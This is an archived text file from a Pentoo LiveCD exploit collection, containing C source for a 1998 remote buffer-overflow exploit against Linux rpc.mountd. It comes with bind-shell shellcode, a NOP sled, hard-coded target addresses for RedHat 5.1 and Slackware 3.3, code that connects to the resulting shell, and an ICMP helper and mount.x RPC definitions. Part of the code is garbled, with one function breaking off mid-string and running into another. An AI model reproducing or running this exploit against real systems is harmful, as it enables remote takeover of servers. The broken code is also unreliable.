Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / rpc / AMDmountd.txt < prev next >

Wrap

Text File | 2005-02-12 | 15KB | 199 lines

---------------- exmnt.c ---------------- /* * Linux rpc.mountd 2.2beta29 exploit * * Coded by plaguez, Antilove, Mikasoft at the ADM Party (7/98) * * Credits: * - DiGiT for finding the vulnerability * Compile: rpcgen mount.x ; gcc exmnt.c */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "mount_clnt.c" #include "mount_xdr.c" #include "ADMgetip.c" #define NOP 0x90 #define WAITPORT 10752 #define STKLEN 200 char buff[10000]; struct target { char desc[80]; int systype; unsigned long addr; int addalign; }; struct target targets[] = { {"RedHat Linux 5.1 k 2.0.35 rpc.mountd", 0, 0x08052d28, 0}, {"Slakware 3.3 k 2.0.33+Solar_Designer's patch rpc.mountd 2.2beta29", 0, 0x0805bbe0, 0}, }; char c0de[] = "\x33\xDB\x33\xC0\xB0\x1B\xCD\x80" /* alarm(0); */ "\x33\xD2\x33\xc0\x8b\xDA\xb0\x06\xcd\x80\xfe\xc2\x75\xf4" /* close FDs */ "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x62\xeb\x62" /* w/ fork() */ //"\x31\xc0\xb0\x02\x90\x90\x85\xc0\x90\x90\xeb\x62" /* w/o fork() */ "\x5e\x56\xac\x3c\xfd\x74\x06\xfe\xc0\x74\x0b" /* =\_ who wrote it? */ "\xeb\xf5\xb0\x30\xfe\xc8\x88\x46\xff\xeb\xec" /* =/` hmm? */ "\x5e\xb0\x02\x89\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb" "\xfe\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66\x89\x46" "\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0" "\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\xeb\x04" "\xeb\x4c\xeb\x52\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80" "\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1" "\xcd\x80\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46" "\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e" "\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x45\xff\xff" "\xff\xFF\xFD\xFF\x50\x72\x69\x76\x65\x74\x20\x41\x44\x4D\x63\x72\x65\x77"; void handle_alarm (sn) int sn; { alarm (0); signal (SIGALRM, SIG_DFL); printf ("Unable to connect: Connection timed out\n"); exit (0); } unsigned long host2ip (char *serv) { struct sockaddr_in sinn; struct hostent *hent; hent = gethostbyname (serv); if (hent == NULL) return 0; bzero ((char *) &sinn, sizeof (sinn)); memcpy ((char *) &sinn.sin_addr, hent->h_addr, hent->h_length); return sinn.sin_addr.s_addr; } void addchar (char *str, char ch) { unsigned int len; len = strlen (str); str[len] = ch; str[len + 1] = 0; } int ConnectServer (char *host, int port) { int sockdesc; struct sockaddr_in sin; struct hostent *he; sin.sin_port = htons (port); sin.sin_family = AF_INET; he = gethostbyname (host); if (he) { memcpy ((caddr_t) & sin.sin_addr.s_addr, he->h_addr, he->h_length); } else { printf ("Error: gethostbyname(): Unable to resolve [%s]\n", host); exit (-1); } if ((sockdesc = socket (AF_INET, SOCK_STREAM, 0)) < 0) { perror ("Error: socket()"); exit (-1); } if (connect (sockdesc, (struct sockaddr *) &sin, sizeof (sin)) < 0) { perror ("Error: connect()"); exit (-1); } return sockdesc; } void MultiplexConnection (int sockdesc) { int ret; char sockbuf[2048]; fd_set readfds; sprintf (sockbuf, "trap '' SIGALRM SIGTRAP\n\ PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH\n\ /usr/sbin/rpc.mountd sin_family = AF_INET; ra->sin_port = htons (rp); if ((ra->sin_addr.s_addr = inet_addr (hn)) == -1) { struct hostent *he; if ((he = gethostbyname (hn)) != (struct hostent *) NULL) { memcpy (&ra->sin_addr.s_addr, he->h_addr, 4); return 1; } else herror ("Unable to resolve hostname"); } else return 1; return 0; } int m00unt (char *host, char *buf) { CLIENT *client; fhstatus *FH; dirpath DIR; char buffer[10000]; int i; char c; /* ini the stuff */ /* mika is fuqn bad @ mace heheheh I OWN HIM %!@$!@$!@ :) */ bzero (buffer, sizeof (buffer)); DIR = buffer; /* create the socket */ if ((client = clnt_create (host, MOUNTPROG, MOUNTVERS, "udp")) == NULL) { printf ("rpc.mountd not registred :>\n"); exit (2); } strncpy (DIR, buf, sizeof (buffer)); if ((mountproc_mnt_1 (&DIR, client)) == -1) { printf ("mountproc_mnt failed :<\n"); exit (0); } } void attack_mountd (loc) char *loc; { int sockdesc; int status; switch (fork ()) { case 0: m00unt (loc, buff); printf ("@#$%#!#$$\n"); exit (1); case -1: printf ("fork error\n"); exit (1); default: printf ("Attente connexion...\n"); fflush (stdout); wait (&status); } sleep (5); sockdesc = ConnectServer (loc, WAITPORT); printf ("Shell found!\n"); MultiplexConnection (sockdesc); close (sockdesc); exit (-1); } void usage (char *pname) { int compt; printf ("\nUsage:\t%s targethost [-t type] [-o offset] [-a align]\n", pname); printf ("\ttargethost may either be name or ip.\n"); printf ("\ttype chooses from a list of predefined targets.\n"); for (compt = 0; compt < sizeof (targets) / (sizeof (struct target)); compt++) printf ("\t\t%i: %s\n", compt, targets[compt].desc); printf ("\toffset is the offset (not required if -t is used)\n"); printf ("\talign is the alignment (not required if -t is used)\n\n"); } int host2a (unsigned long ipz) { struct in_addr muf; muf.s_addr = ipz; return ((103 - (strlen (inet_ntoa (muf)))) % 4); } void main (argc, argv) int argc; char *argv[]; { int i; struct sockaddr_in ra; struct in_addr blah; unsigned long muf; char *ptr; char *endbuff; char *target = NULL; unsigned long addr; unsigned char jmp; long *l_ptr; int offset = 0; int bsize = 1024; int align = -1; int targ = 0; char o; char *argv0 = strdup (argv[0]); while ((o = getopt (argc, argv, "a:o:t:h")) != -1) switch (o) { case 'h': usage (argv0); exit (1); case 'o': if (optarg) offset -= atoi (optarg); break; case 't': if (optarg) targ = atoi (optarg); break; case 'a': if (optarg) align = atoi(optarg); break; } argc -= optind; argv += optind; target = *argv; if (!target) { usage (argv0); exit (1); } memset (buff, '\x90', bsize); printf ("selected target (-t %d): %s.\n", targ, targets[targ].desc); addr = targets[targ].addr; printf ("shellcode lenght: %i\n", strlen(c0de)); printf ("buffer size: %i\n", bsize); addr += offset; printf ("offset: %d\n", offset); printf ("address: 0x%lx\n", addr); getlocalip (&muf, host2ip (target)); blah.s_addr = muf; printf ("local ip = %s\n", inet_ntoa (blah)); if (align < 0) align = host2a (muf); printf ("align = %i\n", align); align += targets[targ].addalign; endbuff = buff + bsize; for (ptr = buff; ptr < (endbuff - strlen(c0de) - STKLEN); ptr++) *ptr = NOP; for (i = 0; i < strlen(c0de); i++) *(ptr++) = c0de[i]; for (ptr += align; ptr < endbuff; ptr += 4) { ptr[0] = (addr & 0x000000ff); ptr[1] = (addr & 0x0000ff00) >> 8; ptr[2] = (addr & 0x00ff0000) >> 16; ptr[3] = (addr & 0xff000000) >> 24; } *endbuff = '\x0'; attack_mountd (target); } /* today 9 Aug 1998 */ ---------------- ADMgetip.c ---------------- #include #include #include #include #include #include "ip_icmp.h" #define ICMP_REPLY_TIMEOUT 15 unsigned short in_cksum (addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } int getlocalip(unsigned long* src,unsigned long dest) { char try = 0; struct sockaddr_in sin; int icmp_sock; int paket_len,sin_len; char paket[1024]; short* chk; struct timeval tm,tm1,tm2; long sec,usec; float ms; fd_set fdset; struct icmphdr* icmp=(struct icmphdr*)paket; kkk: icmp_sock=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); FD_ZERO(&fdset); FD_SET(icmp_sock,&fdset); tm.tv_sec=ICMP_REPLY_TIMEOUT;; tm.tv_usec=0; sin.sin_family=AF_INET; sin.sin_port=htons(0); sin.sin_addr.s_addr=dest; paket_len=8; icmp->type=8; icmp->code=0; icmp->checksum=0; icmp->un.echo.id=59; icmp->un.echo.sequence=0; icmp->checksum=in_cksum(icmp,paket_len); sin_len=sizeof(sin); sendto(icmp_sock,&paket,paket_len,0,(struct sockaddr *)&sin,sin_len); gettimeofday(&tm1,NULL); if (select(icmp_sock+1,&fdset,NULL,NULL,&tm)==1) { recvfrom(icmp_sock,&paket,sizeof(paket),0,(struct sockaddr *)&sin,&sin_len); gettimeofday(&tm2,NULL); sec=tm2.tv_sec-tm1.tv_sec; usec=tm2.tv_usec-tm1.tv_usec; ms=(sec*1000)+((float)usec/1000); printf("ping: %9.2fms\n",ms); } else { printf("ping timeout\n"); try ++; if ( try > 2 )return(-1); close (icmp_sock); goto kkk; } *src=sin.sin_addr.s_addr; return 0; } --------------- ip_icmp.h --------------- struct icmphdr { u_int8_t type; /* message type */ u_int8_t code; /* type sub-code */ u_int16_t checksum; union { struct { u_int16_t id; u_int16_t sequence; } echo; /* echo datagram */ u_int32_t gateway; /* gateway address */ struct { u_int16_t __unused; u_int16_t mtu; } frag; /* path mtu discovery */ } un; }; #define ICMP_ECHOREPLY 0 /* Echo Reply */ #define ICMP_DEST_UNREACH 3 /* Destination Unreachable */ #define ICMP_SOURCE_QUENCH 4 /* Source Quench */ #define ICMP_REDIRECT 5 /* Redirect (change route) */ #define ICMP_ECHO 8 /* Echo Request */ #define ICMP_TIME_EXCEEDED 11 /* Time Exceeded */ #define ICMP_PARAMETERPROB 12 /* Parameter Problem */ #define ICMP_TIMESTAMP 13 /* Timestamp Request */ #define ICMP_TIMESTAMPREPLY 14 /* Timestamp Reply */ #define ICMP_INFO_REQUEST 15 /* Information Request */ #define ICMP_INFO_REPLY 16 /* Information Reply */ #define ICMP_ADDRESS 17 /* Address Mask Request */ #define ICMP_ADDRESSREPLY 18 /* Address Mask Reply */ #define NR_ICMP_TYPES 18 /* Codes for UNREACH. */ #define ICMP_NET_UNREACH 0 /* Network Unreachable */ #define ICMP_HOST_UNREACH 1 /* Host Unreachable */ #define ICMP_PROT_UNREACH 2 /* Protocol Unreachable */ #define ICMP_PORT_UNREACH 3 /* Port Unreachable */ #define ICMP_FRAG_NEEDED 4 /* Fragmentation Needed/DF set */ #define ICMP_SR_FAILED 5 /* Source Route failed */ #define ICMP_NET_UNKNOWN 6 #define ICMP_HOST_UNKNOWN 7 #define ICMP_HOST_ISOLATED 8 #define ICMP_NET_ANO 9 #define ICMP_HOST_ANO 10 #define ICMP_NET_UNR_TOS 11 #define ICMP_HOST_UNR_TOS 12 #define ICMP_PKT_FILTERED 13 /* Packet filtered */ #define ICMP_PREC_VIOLATION 14 /* Precedence violation */ #define ICMP_PREC_CUTOFF 15 /* Precedence cut off */ #define NR_ICMP_UNREACH 15 /* instead of hardcoding immediate value */ /* Codes for REDIRECT. */ #define ICMP_REDIR_NET 0 /* Redirect Net */ #define ICMP_REDIR_HOST 1 /* Redirect Host */ #define ICMP_REDIR_NETTOS 2 /* Redirect Net for TOS */ #define ICMP_REDIR_HOSTTOS 3 /* Redirect Host for TOS */ /* Codes for TIME_EXCEEDED. */ #define ICMP_EXC_TTL 0 /* TTL count exceeded */ #define ICMP_EXC_FRAGTIME 1 /* Fragment Reass time exceeded */ ------------ mount.x ------------ /* @(#)mount.x 2.1 88/08/01 4.0 RPCSRC */ /* @(#)mount.x 1.2 87/09/18 Copyr 1987 Sun Micro */ /* * Sun RPC is a product of Sun Microsystems, Inc. and is provided for * unrestricted use provided that this legend is included on all tape * media and as a part of the software program in whole or part. Users * may copy or modify Sun RPC without charge, but are not authorized * to license or distribute it to anyone else except as part of a product or * program developed by the user. * * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE. * * Sun RPC is provided with no support and without any obligation on the * part of Sun Microsystems, Inc. to assist in its use, correction, * modification or enhancement. * * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC * OR ANY PART THEREOF. * * In no event will Sun Microsystems, Inc. be liable for any lost revenue * or profits or other special, indirect and consequential damages, even if * Sun has been advised of the possibility of such damages. * * Sun Microsystems, Inc. * 2550 Garcia Avenue * Mountain View, California 94043 */ /* * Protocol description for the mount program */ const MNTPATHLEN = 1024; /* maximum bytes in a pathname argument */ const MNTNAMLEN = 255; /* maximum bytes in a name argument */ const FHSIZE = 32; /* size in bytes of a file handle */ /* * The fhandle is the file handle that the server passes to the client. * All file operations are done using the file handles to refer to a file * or a directory. The file handle can contain whatever information the * server needs to distinguish an individual file. */ typedef opaque fhandle[FHSIZE]; /* * If a status of zero is returned, the call completed successfully, and * a file handle for the directory follows. A non-zero status indicates * some sort of error. The status corresponds with UNIX error numbers. */ union fhstatus switch (unsigned fhs_status) { case 0: fhandle fhs_fhandle; default: void; }; /* * The type dirpath is the pathname of a directory */ typedef string dirpath; /* * The type name is used for arbitrary names (hostnames, groupnames) */ typedef string name; /* * A list of who has what mounted */ typedef struct mountbody *mountlist; struct mountbody { name ml_hostname; dirpath ml_directory; mountlist ml_next; }; /* * A list of netgroups */ typedef struct groupnode *groups; struct groupnode { name gr_name; groups gr_next; }; /* * A list of what is exported and to whom */ typedef struct exportnode *exports; struct exportnode { dirpath ex_dir; groups ex_groups; exports ex_next; }; program MOUNTPROG { /* * Version one of the mount protocol communicates with version two * of the NFS protocol. The only connecting point is the fhandle * structure, which is the same for both protocols. */ version MOUNTVERS { /* * Does no work. It is made available in all RPC services * to allow server reponse testing and timing */ void MOUNTPROC_NULL(void) = 0; /* * If fhs_status is 0, then fhs_fhandle contains the * file handle for the directory. This file handle may * be used in the NFS protocol. This procedure also adds * a new entry to the mount list for this client mounting * the directory. * Unix authentication required. */ fhstatus MOUNTPROC_MNT(dirpath) = 1; /* * Returns the list of remotely mounted filesystems. The * mountlist contains one entry for each hostname and * directory pair. */ mountlist MOUNTPROC_DUMP(void) = 2; /* * Removes the mount list entry for the directory * Unix authentication required. */ void MOUNTPROC_UMNT(dirpath) = 3; /* * Removes all of the mount list entries for this client * Unix authentication required. */ void MOUNTPROC_UMNTALL(void) = 4; /* * Returns a list of all the exported filesystems, and which * machines are allowed to import it. */ exports MOUNTPROC_EXPORT(void) = 5; /* * Identical to MOUNTPROC_EXPORT above */ exports MOUNTPROC_EXPORTALL(void) = 6; } = 1; } = 100005;